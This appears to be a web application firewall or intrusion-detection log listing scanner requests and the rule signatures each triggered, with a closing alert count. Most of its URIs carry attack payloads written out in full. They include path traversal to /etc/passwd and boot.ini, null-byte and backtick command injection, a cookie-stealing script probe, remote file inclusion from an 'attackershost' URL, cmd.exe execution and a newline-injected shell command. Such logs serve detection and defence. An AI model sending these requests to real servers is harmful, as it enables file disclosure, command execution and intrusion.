Packet [3733]	Uri [/forum-ra_professionnel.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3734]	Uri [/forum-ra_professionnel.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3748]	Uri [/forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3750]	Uri [/forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3751]	Uri [/forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3752]	Uri [/forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3753]	Uri [/forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3754]	Uri [/forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3755]	Uri [/forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3756]	Uri [/forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3757]	Uri [/forum1.asp?n=/.\./.\./.\./.\./.\./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3758]	Uri [/forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3759]	Uri [/forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3760]	Uri [/forum1.asp?n=1753&amp;nn=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3762]	Uri [/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3763]	Uri [/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3764]	Uri [/forum1.asp?n=1753&amp;nn=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3765]	Uri [/forum1.asp?n=1753&amp;nn=/..../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3766]	Uri [/forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3767]	Uri [/forum1.asp?n=1753&amp;nn=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3768]	Uri [/forum1.asp?n=1753&amp;nn=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3769]	Uri [/forum1.asp?n=1753&amp;nn=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3770]	Uri [/forum1.asp?n=1753&amp;nn=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3771]	Uri [/forum1.asp?n=1753&amp;nn=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3772]	Uri [/forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [1 ]	Signatures	[930120]
Packet [3773]	Uri [/forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [1 ]	Signatures	[930120]
Packet [3774]	Uri [/forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3776]	Uri [/forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3777]	Uri [/forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3778]	Uri [/forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3779]	Uri [/forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3780]	Uri [/forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3781]	Uri [/forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3782]	Uri [/forum1_professionnel.asp?n=/.\./.\./.\./.\./.\./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3783]	Uri [/forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3784]	Uri [/forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3785]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3788]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3789]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3790]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3791]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3792]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/.\./.\./.\./.\./.\./boot.ini&amp;page=1]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3793]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3794]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3795]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3796]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3798]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3799]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3800]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3801]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3802]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3803]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3804]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3805]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3806]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3807]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3808]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1]	Nattacks [1 ]	Signatures	[930120]
Packet [3809]	Uri [/forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [1 ]	Signatures	[930120]
Packet [3830]	Uri [/homebet/homSensePostNotThereNoNo.dll?form=menu&amp;option=menu-signin]	Nattacks [1 ]	Signatures	[920440]
Packet [3831]	Uri [/homebet/homebet.dll?form=menu&amp;option=menu-signin]	Nattacks [1 ]	Signatures	[920440]
Packet [3858]	Uri [//indSensePostNotThereNoNo.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20]	Nattacks [1 ]	Signatures	[941180]
Packet [3859]	Uri [/index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20]	Nattacks [1 ]	Signatures	[941180]
Packet [3901]	Uri [/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd]	Nattacks [8 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932115]	[932160]	[942460]
Packet [3906]	Uri [/mantis/sumSensePostNotThereNoNo.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F]	Nattacks [2 ]	Signatures	[931120]	[931130]
Packet [3907]	Uri [/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F]	Nattacks [2 ]	Signatures	[931120]	[931130]
Packet [3919]	Uri [/modif_infos.asp?n=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3921]	Uri [/modif_infos.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3922]	Uri [/modif_infos.asp?n=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3923]	Uri [/modif_infos.asp?n=/.../.../.../.../.../.../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3924]	Uri [/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [3925]	Uri [/modif_infos.asp?n=/../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3926]	Uri [/modif_infos.asp?n=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3927]	Uri [/modif_infos.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3928]	Uri [/modif_infos.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3929]	Uri [/modif_infos.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3977]	Uri [/php/phpSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3978]	Uri [/php/phpSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3979]	Uri [/php/php4ts.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3990]	Uri [/productcart/database/EIPSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [3991]	Uri [/productcart/database/EIPC.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [4008]	Uri [//pt_SensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [4009]	Uri [/pt_config.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [4015]	Uri [/quikmail/nphSensePostNotThereNoNo.cgi?type=../%00]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930110]	[930110]	[942460]
Packet [4016]	Uri [/quikmail/nph-emumail.cgi?type=../%00]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930110]	[930110]	[942460]
Packet [4021]	Uri [/scripts/traSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [4022]	Uri [/scripts/tradecli.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [4023]	Uri [/scripts/traSensePostNotThereNoNo.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [4024]	Uri [/scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [4038]	Uri [/shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [4039]	Uri [/Site/bizSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [4040]	Uri [/Site/biztalkhttpreceive.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [4067]	Uri [/tmp_view.php?file=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [4088]	Uri [/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd]	Nattacks [5 ]	Signatures	[920272]	[921151]	[930120]	[932105]	[932160]
# N. packets [4125], [704] with alerts, N. Alerts [1940]
